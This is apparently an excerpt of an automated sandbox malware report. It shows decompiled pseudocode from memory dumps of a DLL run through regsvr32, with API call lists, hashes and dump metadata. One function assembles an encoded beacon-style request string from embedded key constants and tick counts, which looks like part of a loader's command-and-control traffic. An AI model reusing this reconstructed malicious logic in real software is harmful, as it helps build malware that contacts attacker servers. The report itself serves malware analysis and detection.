                                    				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                    				_t89 = _t95;
                                    				_t96 = _t95 - 8;
                                    				_push(_t65);
                                    				_push(_t84);
                                    				_push(_t89);
                                    				asm("cld");
                                    				_t66 = _a8;
                                    				_t44 = _a4;
                                    				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                    					_push(_t89);
                                    					E6E2A23DB(_t66 + 0x10, _t66, 0xffffffff);
                                    					_t46 = 1;
                                    				} else {
                                    					_v12 = _t44;
                                    					_v8 = _a12;
                                    					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                    					_t86 =  *(_t66 + 0xc);
                                    					_t80 =  *(_t66 + 8);
                                    					_t49 = E6E2A2495(_t66);
                                    					_t99 = _t96 + 4;
                                    					if(_t49 == 0) {
                                    						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                    						goto L11;
                                    					} else {
                                    						while(_t86 != 0xffffffff) {
                                    							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                    							if(_t53 == 0) {
                                    								L8:
                                    								_t80 =  *(_t66 + 8);
                                    								_t86 = _t80[_t86 + _t86 * 2];
                                    								continue;
                                    							} else {
                                    								_t54 =  *_t53();
                                    								_t89 = _t89;
                                    								_t86 = _t86;
                                    								_t66 = _a8;
                                    								_t55 = _t54;
                                    								_t106 = _t54;
                                    								if(_t106 == 0) {
                                    									goto L8;
                                    								} else {
                                    									if(_t106 < 0) {
                                    										_t46 = 0;
                                    									} else {
                                    										_t82 =  *(_t66 + 8);
                                    										E6E2A2380(_t55, _t66);
                                    										_t89 = _t66 + 0x10;
                                    										E6E2A23DB(_t89, _t66, 0);
                                    										_t99 = _t99 + 0xc;
                                    										E6E2A2477(_t82[2], 1);
                                    										 *(_t66 + 0xc) =  *_t82;
                                    										_t66 = 0;
                                    										_t86 = 0;
                                    										 *(_t82[2])();
                                    										goto L8;
                                    									}
                                    								}
                                    							}
                                    							goto L13;
                                    						}
                                    						L11:
                                    						_t46 = 1;
                                    					}
                                    				}
                                    				L13:
                                    				return _t46;
                                    			}
























                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                    • Instruction ID: 10bd9ad8db7ec40c4c31837bf4a497ad22deafe36621561c37257f4c51c7f252
                                    • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                    • Instruction Fuzzy Hash: 3A21C8B79002099FD700DFADC8C09ABB7AAFF49350B4585A8DA559B245DB30FA15C7E0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 71%
                                    			E001A7E30(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				void* __ebp;
                                    				signed int* _t43;
                                    				char _t44;
                                    				void* _t46;
                                    				void* _t49;
                                    				intOrPtr* _t53;
                                    				void* _t54;
                                    				void* _t65;
                                    				long _t66;
                                    				signed int* _t80;
                                    				signed int* _t82;
                                    				void* _t84;
                                    				signed int _t86;
                                    				void* _t89;
                                    				void* _t95;
                                    				void* _t96;
                                    				void* _t99;
                                    				void* _t106;
                                    
                                    				_t43 = _t84;
                                    				_t65 = __ebx + 2;
                                    				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                    				_t89 = _t95;
                                    				_t96 = _t95 - 8;
                                    				_push(_t65);
                                    				_push(_t84);
                                    				_push(_t89);
                                    				asm("cld");
                                    				_t66 = _a8;
                                    				_t44 = _a4;
                                    				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                    					_push(_t89);
                                    					E001A7F9B(_t66 + 0x10, _t66, 0xffffffff);
                                    					_t46 = 1;
                                    				} else {
                                    					_v12 = _t44;
                                    					_v8 = _a12;
                                    					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                    					_t86 =  *(_t66 + 0xc);
                                    					_t80 =  *(_t66 + 8);
                                    					_t49 = E001A8055(_t66);
                                    					_t99 = _t96 + 4;
                                    					if(_t49 == 0) {
                                    						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                    						goto L11;
                                    					} else {
                                    						while(_t86 != 0xffffffff) {
                                    							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                    							if(_t53 == 0) {
                                    								L8:
                                    								_t80 =  *(_t66 + 8);
                                    								_t86 = _t80[_t86 + _t86 * 2];
                                    								continue;
                                    							} else {
                                    								_t54 =  *_t53();
                                    								_t89 = _t89;
                                    								_t86 = _t86;
                                    								_t66 = _a8;
                                    								_t55 = _t54;
                                    								_t106 = _t54;
                                    								if(_t106 == 0) {
                                    									goto L8;
                                    								} else {
                                    									if(_t106 < 0) {
                                    										_t46 = 0;
                                    									} else {
                                    										_t82 =  *(_t66 + 8);
                                    										E001A7F40(_t55, _t66);
                                    										_t89 = _t66 + 0x10;
                                    										E001A7F9B(_t89, _t66, 0);
                                    										_t99 = _t99 + 0xc;
                                    										E001A8037(_t82[2]);
                                    										 *(_t66 + 0xc) =  *_t82;
                                    										_t66 = 0;
                                    										_t86 = 0;
                                    										 *(_t82[2])(1);
                                    										goto L8;
                                    									}
                                    								}
                                    							}
                                    							goto L13;
                                    						}
                                    						L11:
                                    						_t46 = 1;
                                    					}
                                    				}
                                    				L13:
                                    				return _t46;
                                    			}
























                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                    • Instruction ID: 487d14da174627030120d1ca316f0cef0a06969c5813f6c3dd974ecff4d55d90
                                    • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                    • Instruction Fuzzy Hash: 5421B676904204AFCB14EF68CCC09ABBBA5FF46350B0685A8ED158B285E730FE15C7E0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674637577.000000006E2F8000.00000040.00020000.sdmp, Offset: 6E2F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2f8000_regsvr32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                    • Instruction ID: 17368a3a383d81e5ed6e08c951824cee96d1ff4fdfd9749a5ff9b857892ea14a
                                    • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                    • Instruction Fuzzy Hash: DF1172773801099FD758CE9ADC91E97F3DAEB89620B198159ED04CB301E676E84286A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674637577.000000006E2F8000.00000040.00020000.sdmp, Offset: 6E2F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2f8000_regsvr32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                                    • Instruction ID: e344c2d998f28ec448d665be57d8aa43dc5331efaa0458920fffbccec4361f4c
                                    • Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                                    • Instruction Fuzzy Hash: F801C47239820ACFD74CCF6ED994E6AFBE5EBC2726B16807EC44687615D230E846C911
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 77%
                                    			E001A323C(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
                                    				void* _v8;
                                    				void* _v12;
                                    				void* _v16;
                                    				void* _v20;
                                    				void* __ebx;
                                    				void* __edi;
                                    				long _t63;
                                    				intOrPtr _t64;
                                    				intOrPtr _t65;
                                    				intOrPtr _t66;
                                    				intOrPtr _t67;
                                    				intOrPtr _t68;
                                    				void* _t71;
                                    				intOrPtr _t72;
                                    				int _t75;
                                    				void* _t76;
                                    				intOrPtr _t77;
                                    				intOrPtr _t81;
                                    				intOrPtr _t85;
                                    				intOrPtr _t86;
                                    				void* _t88;
                                    				void* _t91;
                                    				intOrPtr _t95;
                                    				intOrPtr _t99;
                                    				intOrPtr* _t101;
                                    				void* _t107;
                                    				intOrPtr _t111;
                                    				signed int _t115;
                                    				char** _t117;
                                    				int _t120;
                                    				intOrPtr* _t123;
                                    				intOrPtr* _t125;
                                    				intOrPtr* _t127;
                                    				intOrPtr* _t129;
                                    				intOrPtr _t132;
                                    				intOrPtr _t135;
                                    				int _t138;
                                    				intOrPtr _t139;
                                    				int _t142;
                                    				void* _t143;
                                    				void* _t144;
                                    				void* _t154;
                                    				int _t157;
                                    				void* _t158;
                                    				void* _t159;
                                    				void* _t160;
                                    				intOrPtr _t161;
                                    				void* _t163;
                                    				long _t167;
                                    				intOrPtr* _t168;
                                    				intOrPtr* _t171;
                                    				void* _t172;
                                    				void* _t174;
                                    				void* _t175;
                                    				void* _t180;
                                    
                                    				_t154 = __edx;
                                    				_t144 = __ecx;
                                    				_t63 = __eax;
                                    				_t143 = _a20;
                                    				_a20 = 8;
                                    				if(__eax == 0) {
                                    					_t63 = GetTickCount();
                                    				}
                                    				_t64 =  *0x1aa018; // 0xd0e4fb36
                                    				asm("bswap eax");
                                    				_t65 =  *0x1aa014; // 0xf7f8bd56
                                    				asm("bswap eax");
                                    				_t66 =  *0x1aa010; // 0xe67532f
                                    				asm("bswap eax");
                                    				_t67 =  *0x1aa00c; // 0x73a6f34e
                                    				asm("bswap eax");
                                    				_t68 =  *0x1aa2d4; // 0x314d7d0
                                    				_t3 = _t68 + 0x1ab622; // 0x74666f73
                                    				_t157 = wsprintfA(_t143, _t3, 3, 0x3d163, _t67, _t66, _t65, _t64,  *0x1aa02c,  *0x1aa004, _t63);
                                    				_t71 = E001A4155();
                                    				_t72 =  *0x1aa2d4; // 0x314d7d0
                                    				_t4 = _t72 + 0x1ab662; // 0x74707526
                                    				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
                                    				_t174 = _t172 + 0x38;
                                    				_t158 = _t157 + _t75;
                                    				if(_a8 != 0) {
                                    					_t139 =  *0x1aa2d4; // 0x314d7d0
                                    					_t8 = _t139 + 0x1ab66d; // 0x732526
                                    					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
                                    					_t174 = _t174 + 0xc;
                                    					_t158 = _t158 + _t142;
                                    				}
                                    				_t76 = E001A35BC(_t144);
                                    				_t77 =  *0x1aa2d4; // 0x314d7d0
                                    				_t10 = _t77 + 0x1ab38a; // 0x6d697426
                                    				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
                                    				_t81 =  *0x1aa2d4; // 0x314d7d0
                                    				_t12 = _t81 + 0x1ab7b4; // 0x32f8f84
                                    				_t180 = _a4 - _t12;
                                    				_t14 = _t81 + 0x1ab33b; // 0x74636126
                                    				_t156 = 0 | _t180 == 0x00000000;
                                    				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
                                    				_t85 =  *0x1aa31c; // 0x32f9808
                                    				_t175 = _t174 + 0x1c;
                                    				if(_t85 != 0) {
                                    					_t135 =  *0x1aa2d4; // 0x314d7d0
                                    					_t18 = _t135 + 0x1ab8e9; // 0x3d736f26
                                    					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
                                    					_t175 = _t175 + 0xc;
                                    					_t160 = _t160 + _t138;
                                    				}
                                    				_t86 =  *0x1aa32c; // 0x32f97d8
                                    				if(_t86 != 0) {
                                    					_t132 =  *0x1aa2d4; // 0x314d7d0
                                    					_t20 = _t132 + 0x1ab685; // 0x73797326
                                    					wsprintfA(_t160 + _t143, _t20, _t86);
                                    					_t175 = _t175 + 0xc;
                                    				}
                                    				_t161 =  *0x1aa37c; // 0x32f9858
                                    				_t88 = E001A49BA(0x1aa00a, _t161 + 4);
                                    				_t167 = 0;
                                    				_v12 = _t88;
                                    				if(_t88 == 0) {
                                    					L28:
                                    					HeapFree( *0x1aa290, _t167, _t143);
                                    					return _a20;
                                    				} else {
                                    					_t91 = RtlAllocateHeap( *0x1aa290, 0, 0x800);
                                    					_a8 = _t91;
                                    					if(_t91 == 0) {
                                    						L27:
                                    						HeapFree( *0x1aa290, _t167, _v12);
                                    						goto L28;
                                    					}
                                    					E001A3D0C(GetTickCount());
                                    					_t95 =  *0x1aa37c; // 0x32f9858
                                    					__imp__(_t95 + 0x40);
                                    					asm("lock xadd [eax], ecx");
                                    					_t99 =  *0x1aa37c; // 0x32f9858
                                    					__imp__(_t99 + 0x40);
                                    					_t101 =  *0x1aa37c; // 0x32f9858
                                    					_t163 = E001A637D(1, _t156, _t143,  *_t101);
                                    					_v20 = _t163;
                                    					asm("lock xadd [eax], ecx");
                                    					if(_t163 == 0) {
                                    						L26:
                                    						HeapFree( *0x1aa290, _t167, _a8);
                                    						goto L27;
                                    					}
                                    					StrTrimA(_t163, 0x1a92ac);
                                    					_push(_t163);
                                    					_t107 = E001A7067();
                                    					_v8 = _t107;
                                    					if(_t107 == 0) {
                                    						L25:
                                    						HeapFree( *0x1aa290, _t167, _t163);
                                    						goto L26;
                                    					}
                                    					 *_t163 = 0;
                                    					__imp__(_a8, _v12);
                                    					_t168 = __imp__;
                                    					 *_t168(_a8, _v8);
                                    					_t111 = E001A5691( *_t168(_a8, _t163), _a8);
                                    					_a4 = _t111;
                                    					if(_t111 == 0) {
                                    						_a20 = 8;
                                    						L23:
                                    						E001A454A();
                                    						L24:
                                    						HeapFree( *0x1aa290, 0, _v8);
                                    						_t167 = 0;
                                    						goto L25;
                                    					}
                                    					_t115 = E001A656F(_t143, 0xffffffffffffffff, _t163,  &_v16);
                                    					_a20 = _t115;
                                    					if(_t115 == 0) {
                                    						_t171 = _v16;
                                    						_a20 = E001A211F(_t171, _a4, _a12, _a16);
                                    						_t123 =  *((intOrPtr*)(_t171 + 8));
                                    						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
                                    						_t125 =  *((intOrPtr*)(_t171 + 8));
                                    						 *((intOrPtr*)( *_t125 + 8))(_t125);
                                    						_t127 =  *((intOrPtr*)(_t171 + 4));
                                    						 *((intOrPtr*)( *_t127 + 8))(_t127);
                                    						_t129 =  *_t171;
                                    						 *((intOrPtr*)( *_t129 + 8))(_t129);
                                    						E001A77EC(_t171);
                                    					}
                                    					if(_a20 != 0x10d2) {
                                    						L18:
                                    						if(_a20 == 0) {
                                    							_t117 = _a12;
                                    							if(_t117 != 0) {
                                    								_t164 =  *_t117;
                                    								_t169 =  *_a16;
                                    								wcstombs( *_t117,  *_t117,  *_a16);
                                    								_t120 = E001A75F0(_t164, _t164, _t169 >> 1);
                                    								_t163 = _v20;
                                    								 *_a16 = _t120;
                                    							}
                                    						}
                                    						goto L21;
                                    					} else {
                                    						if(_a12 != 0) {
                                    							L21:
                                    							E001A77EC(_a4);
                                    							if(_a20 == 0 || _a20 == 0x10d2) {
                                    								goto L24;
                                    							} else {
                                    								goto L23;
                                    							}
                                    						}
                                    						_a20 = _a20 & 0x00000000;
                                    						goto L18;
                                    					}
                                    				}
                                    			}

                                    APIs
                                    • GetTickCount.KERNEL32(?), ref: 001A3253
                                    • wsprintfA.USER32 ref: 001A32A0
                                    • wsprintfA.USER32 ref: 001A32BD
                                    • wsprintfA.USER32 ref: 001A32DD
                                    • wsprintfA.USER32 ref: 001A32FB
                                    • wsprintfA.USER32 ref: 001A331E
                                    • wsprintfA.USER32 ref: 001A333F
                                    • wsprintfA.USER32 ref: 001A335F
                                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001A3390
                                    • GetTickCount.KERNEL32 ref: 001A33A1
                                    • RtlEnterCriticalSection.NTDLL(032F9818), ref: 001A33B5
                                    • RtlLeaveCriticalSection.NTDLL(032F9818), ref: 001A33D3
                                      • Part of subcall function 001A637D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,001A72E3,00000000,032F9858), ref: 001A63A8
                                      • Part of subcall function 001A637D: lstrlen.KERNEL32(00000000,?,00000000,001A72E3,00000000,032F9858), ref: 001A63B0
                                      • Part of subcall function 001A637D: strcpy.NTDLL ref: 001A63C7
                                      • Part of subcall function 001A637D: lstrcat.KERNEL32(00000000,00000000), ref: 001A63D2
                                      • Part of subcall function 001A637D: StrTrimA.SHLWAPI(00000000,=), ref: 001A63EF
                                    • StrTrimA.SHLWAPI(00000000,001A92AC), ref: 001A3408
                                      • Part of subcall function 001A7067: lstrlen.KERNEL32(032F8AA2,00000000,00000000,00000000,001A730A,00000000), ref: 001A7077
                                      • Part of subcall function 001A7067: lstrlen.KERNEL32(?), ref: 001A707F
                                      • Part of subcall function 001A7067: lstrcpy.KERNEL32(00000000,032F8AA2), ref: 001A7093
                                      • Part of subcall function 001A7067: lstrcat.KERNEL32(00000000,?), ref: 001A709E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 001A3428
                                    • lstrcat.KERNEL32(00000000,?), ref: 001A343A
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 001A3440
                                      • Part of subcall function 001A5691: lstrlen.KERNEL32(?,00000000,032F9F00,754B94D8,001A291A,032FA0FD,001A5FB9,001A5FB9,?,001A5FB9,?,69B25F44,E8FA7DD7,00000000), ref: 001A5698
                                      • Part of subcall function 001A5691: mbstowcs.NTDLL ref: 001A56C1
                                      • Part of subcall function 001A5691: memset.NTDLL ref: 001A56D3
                                      • Part of subcall function 001A656F: CoCreateInstance.OLE32(0002DF01,00000000,00000004,032F8828,00000000), ref: 001A659D
                                    • wcstombs.NTDLL ref: 001A34D1
                                      • Part of subcall function 001A211F: SysAllocString.OLEAUT32(00000000), ref: 001A2160
                                      • Part of subcall function 001A77EC: HeapFree.KERNEL32(00000000,00000000,001A1333), ref: 001A77F8
                                    • HeapFree.KERNEL32(00000000,?,00000000), ref: 001A3512
                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001A3522
                                    • HeapFree.KERNEL32(00000000,00000000,?), ref: 001A3532
                                    • HeapFree.KERNEL32(00000000,?), ref: 001A3542
                                    • HeapFree.KERNEL32(00000000,?), ref: 001A3550
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateCreateEnterInstanceLeaveStringmbstowcsmemsetstrcpywcstombs
                                    • String ID:
                                    • API String ID: 3915760265-0
                                    • Opcode ID: 44f01c48f23ece43ca1c1816cf571bb44661a8141ee7b9de8dccf5772bf11566
                                    • Instruction ID: 4be3170f06870bc6cfdb88031d7bd7c9359aa3abea929ac687efe32445f9a19b
                                    • Opcode Fuzzy Hash: 44f01c48f23ece43ca1c1816cf571bb44661a8141ee7b9de8dccf5772bf11566
                                    • Instruction Fuzzy Hash: 74A18D75900209AFCB12DFA8DD88FAA3BB9FF4A350F144025F909C7661D735DA94CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 6E2C8F85
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA354
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA366
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA378
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA38A
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA39C
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA3AE
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA3C0
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA3D2
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA3E4
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA3F6
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA408
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA41A
                                      • Part of subcall function 6E2CA337: _free.LIBCMT ref: 6E2CA42C
                                    • _free.LIBCMT ref: 6E2C8F7A
                                      • Part of subcall function 6E2C761D: HeapFree.KERNEL32(00000000,00000000), ref: 6E2C7633
                                      • Part of subcall function 6E2C761D: GetLastError.KERNEL32(?,?,6E2CA4CC,?,00000000,?,00000000,?,6E2CA4F3,?,00000007,?,?,6E2C90D9,?,?), ref: 6E2C7645
                                    • _free.LIBCMT ref: 6E2C8F9C
                                    • _free.LIBCMT ref: 6E2C8FB1
                                    • _free.LIBCMT ref: 6E2C8FBC
                                    • _free.LIBCMT ref: 6E2C8FDE
                                    • _free.LIBCMT ref: 6E2C8FF1
                                    • _free.LIBCMT ref: 6E2C8FFF
                                    • _free.LIBCMT ref: 6E2C900A
                                    • _free.LIBCMT ref: 6E2C9042
                                    • _free.LIBCMT ref: 6E2C9049
                                    • _free.LIBCMT ref: 6E2C9066
                                    • _free.LIBCMT ref: 6E2C907E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID: 8f/n
                                    • API String ID: 161543041-3768044786
                                    • Opcode ID: f609f4e0d79902927b3c15cd604cd1d8b33695c1d946bf439eb73b4e54cf67ff
                                    • Instruction ID: 663ef0f6f7beb9524ddc9d93b0e2171ee89d0db11ae7d0fdd64cdd8f456a8b0e
                                    • Opcode Fuzzy Hash: f609f4e0d79902927b3c15cd604cd1d8b33695c1d946bf439eb73b4e54cf67ff
                                    • Instruction Fuzzy Hash: B431AF3190460A9FEBE09AB9DC05B86B3EBEF00B15F604E19E469C7190DB71E850CB16
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _free.LIBCMT ref: 6E2C6C30
                                      • Part of subcall function 6E2C761D: HeapFree.KERNEL32(00000000,00000000), ref: 6E2C7633
                                      • Part of subcall function 6E2C761D: GetLastError.KERNEL32(?,?,6E2CA4CC,?,00000000,?,00000000,?,6E2CA4F3,?,00000007,?,?,6E2C90D9,?,?), ref: 6E2C7645
                                    • _free.LIBCMT ref: 6E2C6C3C
                                    • _free.LIBCMT ref: 6E2C6C47
                                    • _free.LIBCMT ref: 6E2C6C52
                                    • _free.LIBCMT ref: 6E2C6C5D
                                    • _free.LIBCMT ref: 6E2C6C68
                                    • _free.LIBCMT ref: 6E2C6C73
                                    • _free.LIBCMT ref: 6E2C6C7E
                                    • _free.LIBCMT ref: 6E2C6C89
                                    • _free.LIBCMT ref: 6E2C6C97
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 43d555be3b6a8d188c4a086bdc3a879d9c116a495f9c58dc6efa8e7a93394e03
                                    • Instruction ID: 584aad0b4f7d0705940e851dff4550223fb27b6e4f88a623ae5cc286f468b609
                                    • Opcode Fuzzy Hash: 43d555be3b6a8d188c4a086bdc3a879d9c116a495f9c58dc6efa8e7a93394e03
                                    • Instruction Fuzzy Hash: 9211A77951010CAFCF81DFA8CC46CD93B6AEF04B54B214AA5BA194F161DB31DA509F82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 27%
                                    			E001A3D9E(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                    				intOrPtr _v8;
                                    				intOrPtr _v12;
                                    				long _v16;
                                    				intOrPtr _v20;
                                    				signed int _v24;
                                    				void* __esi;
                                    				long _t43;
                                    				intOrPtr _t44;
                                    				intOrPtr _t46;
                                    				void* _t48;
                                    				void* _t49;
                                    				void* _t50;
                                    				intOrPtr _t54;
                                    				intOrPtr _t57;
                                    				void* _t58;
                                    				void* _t59;
                                    				void* _t60;
                                    				intOrPtr _t66;
                                    				void* _t71;
                                    				void* _t74;
                                    				intOrPtr _t75;
                                    				void* _t77;
                                    				intOrPtr _t79;
                                    				intOrPtr* _t80;
                                    				intOrPtr _t91;
                                    
                                    				_t79 =  *0x1aa38c; // 0x32f9e00
                                    				_v24 = 8;
                                    				_t43 = GetTickCount();
                                    				_push(5);
                                    				_t74 = 0xa;
                                    				_v16 = _t43;
                                    				_t44 = E001A6AF5(_t74,  &_v16);
                                    				_v8 = _t44;
                                    				if(_t44 == 0) {
                                    					_v8 = 0x1a91ac;
                                    				}
                                    				_t46 = E001A5D9A(_t79);
                                    				_v12 = _t46;
                                    				if(_t46 != 0) {
                                    					_t80 = __imp__;
                                    					_t48 =  *_t80(_v8, _t71);
                                    					_t49 =  *_t80(_v12);
                                    					_t50 =  *_t80(_a4);
                                    					_t54 = E001A77D7(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                    					_v20 = _t54;
                                    					if(_t54 != 0) {
                                    						_t75 =  *0x1aa2d4; // 0x314d7d0
                                    						_t16 = _t75 + 0x1abab8; // 0x530025
                                    						 *0x1aa138(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                    						_push(4);
                                    						_t77 = 5;
                                    						_t57 = E001A6AF5(_t77,  &_v16);
                                    						_v8 = _t57;
                                    						if(_t57 == 0) {
                                    							_v8 = 0x1a91b0;
                                    						}
                                    						_t58 =  *_t80(_v8);
                                    						_t59 =  *_t80(_v12);
                                    						_t60 =  *_t80(_a4);
                                    						_t91 = E001A77D7(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                    						if(_t91 == 0) {
                                    							E001A77EC(_v20);
                                    						} else {
                                    							_t66 =  *0x1aa2d4; // 0x314d7d0
                                    							_t31 = _t66 + 0x1abbd8; // 0x73006d
                                    							 *0x1aa138(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                    							 *_a16 = _v20;
                                    							_v24 = _v24 & 0x00000000;
                                    							 *_a20 = _t91;
                                    						}
                                    					}
                                    					E001A77EC(_v12);
                                    				}
                                    				return _v24;
                                    			}





























                                    APIs
                                    • GetTickCount.KERNEL32(?,001A462D), ref: 001A3DB3
                                    • lstrlen.KERNEL32(?,80000002,00000005), ref: 001A3DF3
                                    • lstrlen.KERNEL32(00000000), ref: 001A3DFC
                                    • lstrlen.KERNEL32(00000000), ref: 001A3E03
                                    • lstrlenW.KERNEL32(80000002), ref: 001A3E10
                                    • lstrlen.KERNEL32(?,00000004), ref: 001A3E70
                                    • lstrlen.KERNEL32(?), ref: 001A3E79
                                    • lstrlen.KERNEL32(?), ref: 001A3E80
                                    • lstrlenW.KERNEL32(?), ref: 001A3E87
                                      • Part of subcall function 001A77EC: HeapFree.KERNEL32(00000000,00000000,001A1333), ref: 001A77F8
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
